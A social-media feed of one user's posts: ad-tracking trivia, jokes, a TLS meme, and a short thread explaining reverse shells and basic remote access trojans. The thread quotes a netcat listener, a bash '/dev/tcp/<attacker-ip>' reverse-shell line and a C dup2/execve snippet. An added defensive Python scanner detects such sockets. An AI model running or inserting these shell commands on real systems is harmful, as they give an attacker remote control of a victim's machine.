
Posts by drop table users

Simplified example: I see an ad for Dove shampoo on a delivery truck. The truck captures the MAC address of my phone. Later on I’m at Target and buy Dove shampoo, instead of Axe. Cross referencing my Target rewards with the MAC address, Dove infers the campaign was effective. (2/2)

1 year ago 0 0 0 0

TIL: Some delivery trucks that display ads aren’t actually making deliveries. Instead they are marketing campaigns that use WiFi beacons to track your device’s MAC address + location for targeting purposes. (1/2)

1 year ago 2 0 1 0

spinach is a scam

1 year ago 4 0 0 0

So… if Canada becomes a US state, how many electoral votes does it get?

Will probably make it difficult for Republicans to retain the presidency, especially when Canadians all lose their healthcare.

1 year ago 298 29 27 4

@proton.me second major protonmail outage in a month and i missed the link to join an interview 😔

1 year ago 5 0 0 0

implement “quick access” and i’ll make the switch from 1pass

1 year ago 0 0 0 0

at approx. 12:00PM (UTC+10) we will start scaling up santa pods (clones of original santa process) across geos- this will ensure efficient and sustainable present delivery

1 year ago 0 0 0 0

instead of a linear delivery route (NPOLE => DEST) present caches should be established across geos

1 year ago 0 0 1 0

the toy production process is sufficiently distributed with scaling worker pods (elves), however the santa delivery sleigh is very inefficient and must be optimized

1 year ago 0 0 1 0

systems design interview but it’s for santa’s delivery queue on xmas eve

1 year ago 1 0 1 0
The TLS Protocol Version 1.0 RFC, January 1999, in ugly meme form.

Top text:
I am not a toy
I am not a Christmas present
I am a 30+ years commitment

Bottom text:
Please think hard before you give someone
an Internet standard this Christmas

1 year ago 1110 214 6 3

TIL everything is a psyop

1 year ago 2 0 0 0

spy kids (2001) was a cia psyop just check out cia.gov/spy-kids

1 year ago 0 0 0 0

spotify wrapped is a cia psyop to reinforce the surveillance state 🤷‍♂️

1 year ago 0 0 0 0

this basically aliases all the standard streams to the socket to provide the attacker an interactive shell to the victim's machine.

full write-up here: jackcarrick.net/blog/reverse...

1 year ago 2 0 0 0

because “everything is a file” in unix systems you can do the same redirection with a networking socket

int socket
...
dup2(socket, STDIN_FILENO);
dup2(socket, STDOUT_FILENO);
dup2(socket, STDERR_FILENO);

Then execute a shell
execve("/bin/sh", argv, NULL);

1 year ago 1 0 1 0
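
The post above describes pointing stdin, stdout and stderr at one socket with dup2. That leaves a trace a defender can look for, shown in this added example (not from the original posts): on Linux, /proc/<pid>/fd/0, 1 and 2 all resolve to the same `socket:[inode]`. The function names and sample values are constructed for illustration. Legitimate inetd-style or socket-activated services can also match, so treat hits as leads to triage.

```python
import os
import re

SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")

def shared_stdio_socket(links):
    """Return the socket inode if fds 0, 1 and 2 all point at one socket, else None."""
    inodes = set()
    for fd in (0, 1, 2):
        m = SOCKET_LINK.match(links.get(fd, ""))
        if not m:
            return None  # a tty, pipe, file, /dev/null or closed fd
        inodes.add(m.group(1))
    return inodes.pop() if len(inodes) == 1 else None

def read_stdio_links(pid, proc_root="/proc"):
    """Map fd number -> readlink() target for a process's fds 0, 1 and 2."""
    links = {}
    for fd in (0, 1, 2):
        try:
            links[fd] = os.readlink(os.path.join(proc_root, str(pid), "fd", str(fd)))
        except OSError:
            pass  # process exited, fd closed, or insufficient privilege
    return links

def scan(proc_root="/proc"):
    """List (pid, exe, inode) for every process whose stdio shares one socket."""
    hits = []
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        inode = shared_stdio_socket(read_stdio_links(pid, proc_root))
        if inode is None:
            continue
        try:
            exe = os.readlink(os.path.join(proc_root, pid, "exe"))
        except OSError:
            exe = "?"
        hits.append((int(pid), exe, inode))
    return hits

# Constructed samples: a terminal shell, a shell with stdio on a socket, a logging daemon.
SAMPLE_TTY = {0: "/dev/pts/3", 1: "/dev/pts/3", 2: "/dev/pts/3"}
SAMPLE_REDIRECTED = {0: "socket:[48211]", 1: "socket:[48211]", 2: "socket:[48211]"}
SAMPLE_DAEMON = {0: "/dev/null", 1: "socket:[51002]", 2: "socket:[51002]"}

if __name__ == "__main__":
    for pid, exe, inode in scan():
        print(f"pid={pid} exe={exe} stdio on socket inode {inode}")
```

Run it as root to see every process; a hit's inode can then be matched to its remote endpoint with `ss -tnpe`.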

so how does this work? in unix systems we can redirect standard communication streams (stdin, stdout, stderr) easily

echo "foo" > bar.txt

internally this uses the dup2 system call:
dup2(old file descriptor, new file descriptor)

1 year ago 0 0 1 0

upon connecting to the server an attacker can input commands into the victim's shell as if it were their own

more robust RATs include more sophisticated control mechanisms (GUIs, keyloggers, webcam access, etc), but this is a pretty good start

1 year ago 0 0 1 0

curious how malware like remote access trojans (RATs) work? turns out you can create a very basic one with two commands:

attacker runs a TCP server:
nc -nlp 4444

victim connects to the server:
bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1

this is called a reverse shell

1 year ago 6 0 1 0
